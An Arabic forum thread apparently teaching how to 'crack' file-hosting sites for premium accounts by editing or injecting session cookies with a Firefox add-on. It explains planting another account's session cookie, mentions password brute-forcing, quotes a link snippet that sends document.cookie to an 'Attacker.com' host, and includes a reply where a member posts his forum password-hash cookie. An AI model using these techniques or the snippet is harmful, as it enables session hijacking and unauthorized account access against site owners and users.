moseba

الوسـام الماسـي
#1

كما وعدتكم إنى سوف أقوم بتكملة الدورة ولكن المشكلة فى تأخرى والله هى ظروف خارجة عن إرادتى
مش فاضى ومشاغل الدنيا....المهم

اليوم سوف نتعلم كيف نتحكم فى الكوكيز ونعدل عليها
الدرس سهل جدا ويتم فى 5 دقائق فقط لا غير إن شاء الله

قبل كل شئ عليك قرأة دروس الدورة قبل البدأ هنا علشان تعرف إحنا بنتكلم عن إيه وما هو الكوكيز
http://www.damasgate.com/vb/t/238850/
http://www.damasgate.com/vb/t/241008/

أقرأهم بالترتيب والمهم الأول مش مهم التانى أوى


المتطلبات.

1-برنامج الفايرفوكس
2- أداة للتعديل على الكوكيز
بالنسبة للأداة..
الذى يستخدم برنامج الMozilla Firefox إصدارات قديمة حتى v3.6 فيقم بإستخدام هذة الأداة
Cookie Editor
هذة الأداة لا تدعم الإصدارات الجديدة

أما الذى يستخدم الإصدارات الجديدة والقديمة حتى v6 يبقى يستخدم هذة الأداة
هذة الأداة تعمل مع كل الإصدارات كاااااااااااااااافة بدون أى مشاكل
Cookie Manager

ولكن سوف يتسأل البعض لماذا وضعت أداة لن أشرحها ولا تعمل مع كل الإصدارات زى التانية؟؟
أقولك إنى أفضل التعامل معها لأصحاب الإصدارات القديمة لأنها أسهل في التعامل ولكن للأسف أنا شخص up-to-date:5998:
فأستخدم الأن الإصدار الأخير من الفاير فوكس ولهذا مضطر إنى أستخدم الأداة الثانية
المهم
ويوجد برده هذة الأداة وهى التطوير للثانية
Cookie Manager +
وهذة الأداة اللى هيكون عليها الشرح إن شاء الله
تعطيك تحكم أكثر في الكوكيز
وأسهل

بعد تحميل الأداة
ينصح بتحميل الأداة الأخيرة
وهى اللى هيكون عليها الشرح إن شاء الله
قم بعمل ريستات للمتصفح بعد تنصيب الأداة كى تعمل(المتصفح بس) :wink:
يعنى تقفله وتفتحه تانى:5998:
قم بتشغيلها من هنا
كود:
[COLOR=Blue]Tools>Cookie Manager+[/COLOR]

فى الإصدارات الجديدة بتضغط على alt علشان يظهر شريط القوائم


شكل الأداة بعد الفتح


كما ترى يوجد العديد من الأشياء بها
عندما كتبت كلمة hotfile فى خانة البحث(مش لازم تضغط إنتر بعدها) ظهر لى العديد من الكوكيز الخاصة بموقع الhotfile
طب دول بتوع إيه وأى واحد نريده؟
كما قلت في الموضوع الأول للدورة من هنا علشان لو حد نسى:close::5998:
هتعرف إن كل شئ يتم تسجيله بالموقع يتم إرساله إلى الموقع للتعرف عليه عن طريق كود وهو الكوكيز
فكل شئ يتم تغيره في صفحة الموقع من لغة وإدخال بيانات وغيره يتم إرساله إلى الموقع بكود وكل واحد له الكوكيز الخاص به بالأسم بتاعه بالمكان اللى هيروحله وهكذا
الكوكيز مش الكود الطويل اللى أنت كنت بتضعه في الموضوع الأول علشان تحمل بريميم
لأ، الكود ده هو الcontent أى محتوى الكوكيز
الكوكيز يشمل أربع أشياء أساسية وهى
Name:وهو أسم الكوكيز(إذا كان لغة-بيانات التسجيل...وغالبا يكتب بكلمة مختصرة تعبر عن الأسم)
Content:وهى محتوى الكويز(ما يحمله)وده الكود اللى مسئول عن التغيرات التى تحدث في الموقع زى ما قلت
Domain:يعنى النطاق(ترجمة حرفية)ولكن في عالم الإنترنت يعنى المتحكم الإدارى أو المتحكم فى الإنترنت فيمكنك أن تطق عليه أسم المضيف Host الذى يتحكم في بروتوكول الإنترنت(IP=Internet Protocol)مثل موقع الإنترنت
فهو يحتوى على الموقع اللى هيتصل به وهيرسله الكوكيز(أو الكود الذى يحتويه الكوكيز بمعنى أدق ولكن تسهيلا بنقول كوكيز)
Path
:المسار اللى هيذهب إليه في الدومين
يبقى الdomain & path بيقولوا للكوكيز أن تذهبى فقط للعنوان ده لا غير
في الدومين لا نكتب www

على سبيل المثال


لقد قمت بإختيار هنا الكوكيز الخاص باللغة وأسمهlang إختصار لكلمة language أى اللغة
ودوست على edit للتعديل يظهر إنه في المحتوى content مكتوب en وهى اللغة الإنجليزية


ثم قمت بتعديلها لتكون اللغة الفرنسية وكودها fr


ودوس على Save للحفظ
وبعد كده دوس على F5 أو إعمل إعادة تحميل للصفحة وهتلاقى اللغة تغيرت إلى الفرنسية


ونفس الحكاية بالعكس وهى إذا كمت بإختيار اللغة من القائمة بالموقع هتتعدل عالطول في الكوكيز الخاص بها وهو الlang




ومن الواضح هنا كل المفاهيم اللى قلتها عن الكوكيز في بداية الشرح


نأتى الأن إلى ما هو أهم وهو التعديل على الكوكيز الخاص بتسجيل البيانات وهو ما نريده
لكل موقع رفع أو أى موقع كوكيز خاص بتسجيل البيانات لكن كل موقع يختلف فى أسم الكوكيز

على سبيل المثال
الهوتفايل أسم الكوكيز بتاعه هو auth
ولكن إتفقنا إنه يدل على محتواه ولكن بإختصار
فهنا auth إختصار لكملة authorization وتعنى ترخيص أى رخصة دخولك للموقع

وموقع الميجا أبلود هى user وطبعا معناها واضح

وموقع الفايل سونيك هى PHPSESSID وتعنى PHP SESSion ID
وده مكتوب بلغة الhtml تقريبا أنا مش فاكر أوى
ودى لأنها بتعتبر دخولك كsession أى جلسة أى الوقت اللى هتفضل فيه وهترحل بعدها

بالنسبة لموقع الفايل سيرف له واحد من إثنين..الأول اللى هو الإفتراضى وهو بيكون PHPSESSID أوالتانى بتعمله بنفسك ويكون بأسم خاص له عادة يكون أسمه cookie أو على حسب

مش كل الكوكيز دى هتلاقيها موجوده لما تفتح الموقع
علشان تظهر كلها يتوجب شئ من الإثنين
1- هو أن تقوم بعمل تسجيل دخول لك بuser مجانى
2- هو أن تعمل كوكيز جديد وتكتب فيه كل محتوياته وده اللى هشرحه دلوقتى إن شاء الله


إضافة كوكيز جديد

طبعا يمكنك تعديل أو
حذف أو إضافة كوكيز عن طريق Edit or Delete or Add
أنا هنا قمت بعمل حذف لكل الكوكيز الخاص بالفايل سونيك وفتحت الموقع
فظهر لى هذة الكوكيز اللى إتعملت أتوماتيك


دوست على Add علشان أضيف كوكيز جديد


وكتبت هنا البيانات بتاعته
في الأسم لازم يراعى الCapital & Small الحروف هنا كلها كابيتال
فى الcontent كتبت كويكز بتاع أكونت بريميم
أو بتكتب أنت أى كوكيز أنت عاوزه
فى الdomain كتبت عنوان الصفحة بدوووون www
فى الpath على حسب المكان اللى فى الموقع اللى فيه بيانات التسجيل غالبا إن لم يكن دائما يكون
كود:
/
ولكن بعض المواقع القليلة تضعه في مسار أخر مثل
كود:
/accounts
وهذا على حسب صاحب الموقع
برمج الموقع وعمله إزاى
واللى عارف لينُكس هيعرف إن"/"هى الroot directory


يعنى هيروح على الموقع على فولدر الroot اللى هو ال"/" وبعدين يفتح الملف المسجل عليه الكوكيز وهو اللى أسمه PHPSESSID ويشوف الكوكيز(كود المحتوى) موجود ولا لأ..لو موجود يفتح لك البوابة لصلاحياتك المخصصة لك.

وده الملخص بتاع الشرح اللى فوق كله
ما علينا:5998::5998:

بعد كتابة البيانات تدوس على save وتعمل إعادة تحميل للصفحة علشان تشوف التغييرات


لو مش معاك أى كوكيز جرب الكوكيز بتاعك وهو عن طريق إنك تسجل دخولك من الصفحة وتأخذ الكوكيز بتاعك فى مكان وبعدين تمسح كل الكوكيز وتفتح الموقع تانى وتجرب زى ما شرحت فوق
بص خلاص
وكل المواقع هتلاقى نفس الطريقة لكن مع إختلاف إسم الكوكيز


بعض المعلومات هامة

من هنا نفهم إنه كى تعرف الكوكيز الخاص ببيانات التسجيل
تقوم بعمل تسجيل دخول ثم تذهب إلى الأداة وتعرف الكوكيز إيه
طبعا الكوكيز ده زى بصمة اليد
لا تتشابهة....أى إختلاف بسيط أوى مهما كان بيختلف الكود كله


الكوكيز كالتشفير

مش كل المواقع تستخدم نفس التشفير ده

زى ما شوفنا الفايل سونيك بتاعه قصير أما الهوتفايل بتاعه طويييييل
أما الفايل سيرف يوجد إثنين طويل أو قصير على حسب(اللى أسمه PHPSESSID ده قصير واللى له أسم غيره يبقى طويل)


لو عملت تسجيل دخول أو خروج
الموقع بيقوم بإضافة أو إزالة الكوكيز على جهازك علشان كده بيعرف الأى بى بتاعك
(العنوان بتاعك) لكن لو عملتها أنت يدويا عن طريق الأداة
يعنى تسجل خروجك عن طريق حذف الكوكيز الخاص بالبيانات
الموقع مش هيعرف وقتها الأى بى بتاعك
لأن الموقع لازم يبقى عارف الأى بى علشان يدخل بيانات تسجيل على جهازك لكن لو أنت دخلتها نيابة عنه يبقى مش مهم يعرف الأى بى لأنه لما هيتصل بجهازك هيلاقى الحاجة دى موجودة فيقوم بقرأتها فقط دون الحاجة لكتابتها

من الصعب جدا إنك تحصل على بيانات التسجيل عن طريق الكوكيز
للحصول عليها
لما تضع الكوكيز هتعرف الأسم لكن إزاى تعرف كلمة السر ودى اللى صعبة
الطريقة الوحيدة هى عن طريق الbruteforce وهى إنك تقوم بإستخدام قائمة طويلة من الباسوردات(التخمين) وتجرب كل واحدة مع الأسم وتشوف أى واحدة ستعمل وتعطي نفس الكوكيز
لأنه كبصمة اليد كما قلت
أو إنك تخترق الموقع وتريح نفسك هههههههههههه
:close: :5998::5998:

حذاااااااااااااارى من أى script تضغط عليه غير موثوق في مصدره لأنه بكل بساطة ممكن يكون كود لسرقة الكوكيز الخاصة بك كلها
مثلا الكود ده
كود:
<a href="#"
 onclick="window.location='http://[COLOR=Red]Attacker[/COLOR].com/stole.cgi?text='+escape(document.cookie);
 return false;">
Click here!</a>
الكود ده وظيفته أنه بدل من أن يتم نقل الكوكيز إلى الموقع اللى المفروض يروحله يغير مساره ليذهب إلى موقع السارق :close::close:


يوجد العديد من الأشياء اللى كنت ناوى أقولها لكن مستعجل
يجب أن أنام الأن علشان عندى أشياء غدا يجب إتمامها
وكمان نسيت والله كتير من المعلومات اللى كنت ناوى أقولها
إلى أن أتذكر
وجلا من لا يسهو


تطبيق عملى
واللى يثبت لى إنه فهم الموضوع تمام يقول لى ما هو الكوكيز الخاص بموقع داماس
وكيف يعمل؟؟؟
ههههههههههههههههه
طبعا بعد إذن حبايب قلبنا الإدارة كلها
.
هو عادى مافيش خطر خالص ولا أى حاجة
على فكرة هو يختلف عن مواقع الرفع ولكن إكتشافه سهلا وليس صعب

إعتبروه كتطبيق وإمتحان علشان أعرف مين فهم ومين مش فاهم ومن يتابع معنا الدورة

...


رجاءا
عدم مراسلتى من أجل أكونتات بريميم لأنه كان أفضل أعمل موضوع أكونت بريميم لكل عضو
اللى عاوز أكونتات يذهب على هذا الموضوع
http://www.damasgate.com/vb/t/238850/
وهذا لأنى لست دائما على النت أنا ورايا شغل ودراسة وخلافه ومشاغل ومشاوير
فلا أضمن لكم أن أقدم لكل واحد أكونت على الخاص
وأنه يدوم مدة طويلة كما يريد
أرجو أن تتفهموا قصدى

إلى لقاء أخر ودرس جديد مع
MoSeBA






 

التعديل الأخير:

Mohamed Khaled

عضوية الشرف
#2
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

بارك الله فيك يا غالي مبدع رائع جدا جدا تسلم الايادي وجزاك الله كل خير
تم التقييم
 

sony_mutso

عضو ذهبي
#3
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

هو انا قريت على السريع كده
الموقع بيستخدم نظام
Name : bbsessionhash
Host : www.damasgate.com
Path : /
send for : any type of connection

مش عارف الكلام ده صح ولا عشان انا قريت بسرعه ومدققتش
عموما اهى تجربه بسيطه وبكره مسيرنا نتعلم ههههههه

 

Eng4Negm

عضو مشارك
#4
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

جزاك الله خيرا
ووفقك الله لما يحبه ويرضاه
 

mohamed555

عضو مميز
#5
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

الف شكر يا moseba وربنا يوفقق وتقدم لنا كل ما هو جديد
توجد بعض النقاط مش مستوعبها ولكن هتيجى معايا
 

احمد الحنون

الوسـام الذهبي
#6
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

جزاكم الله خير
 

ميشو عاطف

الوسـام الذهبي
#7
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

مشكور
و لكنى اتوقف عند كتابة الكويكز
فياريت لو تكتب لينا بعض الكويكزات او تشرح لنا بالصور كيف نجلب الكويكز الخاص بنا
 

moseba

الوسـام الماسـي
#8
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

بارك الله فيك يا غالي مبدع رائع جدا جدا تسلم الايادي وجزاك الله كل خير
تم التقييم
حبيب قلبى ومشرفنا العزيز نورت الموضوع


هو انا قريت على السريع كده
الموقع بيستخدم نظام
Name : bbsessionhash
Host : www.damasgate.com
Path : /
send for : any type of connection

مش عارف الكلام ده صح ولا عشان انا قريت بسرعه ومدققتش
عموما اهى تجربه بسيطه وبكره مسيرنا نتعلم ههههههه

كويس إنك وصلت لهنا لكن تذكر إنى قلت لك إن الكوكيز زى بصمة اليد لا يتغير أبداً إلا لو غيرت أنت في بيناتك أى شئ صغير بها
لما تعمل تسجيل خروج وبعدين دخول هتلاقى الكوكيز ده بيتغير في كل مرة يبقى مش هوا
حاول مرة أخرى
جزاك الله خيرا
ووفقك الله لما يحبه ويرضاه
وجزاك خيراً نورت الموضوع أخى

الف شكر يا moseba وربنا يوفقق وتقدم لنا كل ما هو جديد
توجد بعض النقاط مش مستوعبها ولكن هتيجى معايا
حبيبى محمد
قولى بس إيه اللى مش مستوعبه لعلنى لم أشرحه جيداً فأقوم بتبسيطه لكم
وجزاك أيضاً

مشكور
و لكنى اتوقف عند كتابة الكويكز
فياريت لو تكتب لينا بعض الكويكزات او تشرح لنا بالصور كيف نجلب الكويكز الخاص بنا
قم بعمل تسجيل دخول لك على الموقع بأكونت خاص بك ثم إذهب على الأداة سوف تجد الكوكيز تم إنشاءه قم بفتحه وقم بنسخ المحتوى فى أى ملف تكستnotepad وبعدين أمسح كل الكوكيز بإنك تعلم عليها وتمسحها وبعدين إفتح الموقع مرة أخرى وجرب كل اللى فوق وقوم بإدخال الكوكيز بتاعك اللى أنت نقلته في ملف التكست
أو إستخدم الكوكيزات البريميم التى يتم وضعها في هذا الموضوع دائماً ومتجدد بإستمرار
http://www.damasgate.com/vb/t/238850/
 

mohamed555

عضو مميز
#9
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

انت مقصرتش فى الشرح يا باشا
ولكنى نفذت الخطوات كما شرحت انت بدون ما استوعب الموضوع كا كل
 

mohamed555

عضو مميز
#10
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

بس ليا استفسار بسيط هل انتهى الدرس الثانى لحد هنا ام يوجد تكمله اخرى
 

moseba

الوسـام الماسـي
#11
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

هو كان فى حاجات كنت عاوز أقولها بس أنا مش فاكرها دلوقتى
إن شاء الله هتتقال فى الدروس القادمة
على فكرة أنا كنت هشرح فى الأول برنامج تانى للتكريك وأشرح معاه إزاى تقوم بعمل الconfiguration بنفسك بس لقيت هيأخذ وقت ومش وقته دلوقتى فخليته على جنب وغيرت الشرح وعملت ده
قلت خليها بالترتيب خلينا فى السهل الأول هع
 

mohamed555

عضو مميز
#12
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

بس ياريت يبقا الدرس القادم فى نفس الموضوع
 

أشرف بيبو

عضو ماسـي
#13
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

ايه الحلاوة دي يا مصيبة
تسلم ايديك
 

moseba

الوسـام الماسـي
#14
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

بس ياريت يبقا الدرس القادم فى نفس الموضوع
ياه عجبك أوى موضوع الكوكيز
ربنا يسهل بس
طب ماقلتش ما هو الكوكيز الخاص بالبوابة
طب للتسهيل قم بعمل تسجيل دخول وخروج مرتين وشوف أى الكوكيز اللى هيفضل زى ما هو
أسهل من كده مااااافييييييش
ايه الحلاوة دي يا مصيبة
تسلم ايديك
من بعض ما عندكم حبيب قلبى يا أشرف منور يا جميل

 

moseba

الوسـام الماسـي
#15
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

على فكرة مش لازم يكون الكوكيز واحد بس ممكن يكون أكتر من كده يعنى ممكن واحد لليوزر وواحد للباس وواحد للسيشن وواحد لكذا
هههههههههههههههههههه
أنا كده سهلتها على الأخخخخخخخخخخخخخخخخخخخخخخخخخخر
 

mohamed555

عضو مميز
#16
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

bbpassword
2c3c7323de3e0d3c3dfd5a5c4cc4b168
 

moseba

الوسـام الماسـي
#17
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

ده الكوكيز الخاص بالباسوورد أين الباقى
فى المنتدى أو أى منتدى مبنى على vb Bulltin كوكيز التسجيل بتاعه منفصل
أسم المستخدم لوحده والباسوورد لوحده وكوكيز خاص بتسجيل الخروج
علشان كده بتشوف بعد تسجيل خروجك بيقولك تم حذف الكوكيز بنجاح
فبيتم حذف الكوكيز الخاص باليوزر والباس وأيضاً الsession
هو كلهم هتلاقى قبلهم bb
لكن الأساس هما الuserid & password طبعاً قبلهم bb
لكن لو حذفتهم مش هيتقفل الحساب:5998:
لازم تحذف معاهم الخاص بتسجيل الدخول والخروج أو تغيير قيمته(هو كل مرة بيتغير لوحده)
اللى هو session
ولا سحر ولا شعوذة
فعلشان تسجل الدخول لازم تدخل كوكيز الباس واليوزر مع بعض
أه وإمسح الكوكيز بتاع الباس اللى أنت كتبته بتاعك عشان مش يتسرق

على فكرة كوكيز اليوزر ده مش مشفر ده الرقم التسلسلى بتاعك يعنى بتاعك هتلاقيه
1820115
أمسح بسرعة الكوكي اللى أنت كتبته علشان أنا كده ممكن أدخل على حسابك
أنا كنت عاوز بس الأسم بتاعه مش المحتوى كمان
ههههههههههههههههههههههههههههه
 

mohamed555

عضو مميز
#18
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

يااستاذى الفاضل انت لو عايز الباسورد نفسه ميغلاش عليك
هو اي نعم اكونت برميم بس بردو ميفلاش عليك ههههههههه
لا كفاية كدا انا مش هكتب اى رقم تانى لحسن يطلع رقم الفيزا بتاعى هههههههههههه
شكرا يا باشا على العموم انا مسحة الرقم من الاداه بس كل ما اجى ادخل من على فاير فوكس مبيدخلش برغم انى بسجل دخول لكن عندما انتقل الى اى صفحه اخرى القيه سجل خروج
لكن شغال على جوجل كروم
 

moseba

الوسـام الماسـي
#19
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

أنا مش قصدى تمسحه من الأداة أنا قصدى تمسحه من الرد اللى أنت كتبته(تعدل الرد وتمسح الرقم)
ههههههه

 

mohamed555

عضو مميز
#20
رد: الدرس الثانى لتكريك مواقع الرفع لأكونتات بريميم من أى موقع+شرحى+بأسم المنتدى

أنا مش قصدى تمسحه من الأداة أنا قصدى تمسحه من الرد اللى أنت كتبته(تعدل الرد وتمسح الرقم)
ههههههه

منت عارف ان اى منتدى بيدى مده زمانيه ربع ساعه لتعديل على الكومنت
وانا دخلت بعد كتابة الكومنت بيوم تقريبا ههههههههههههه
 

أعلى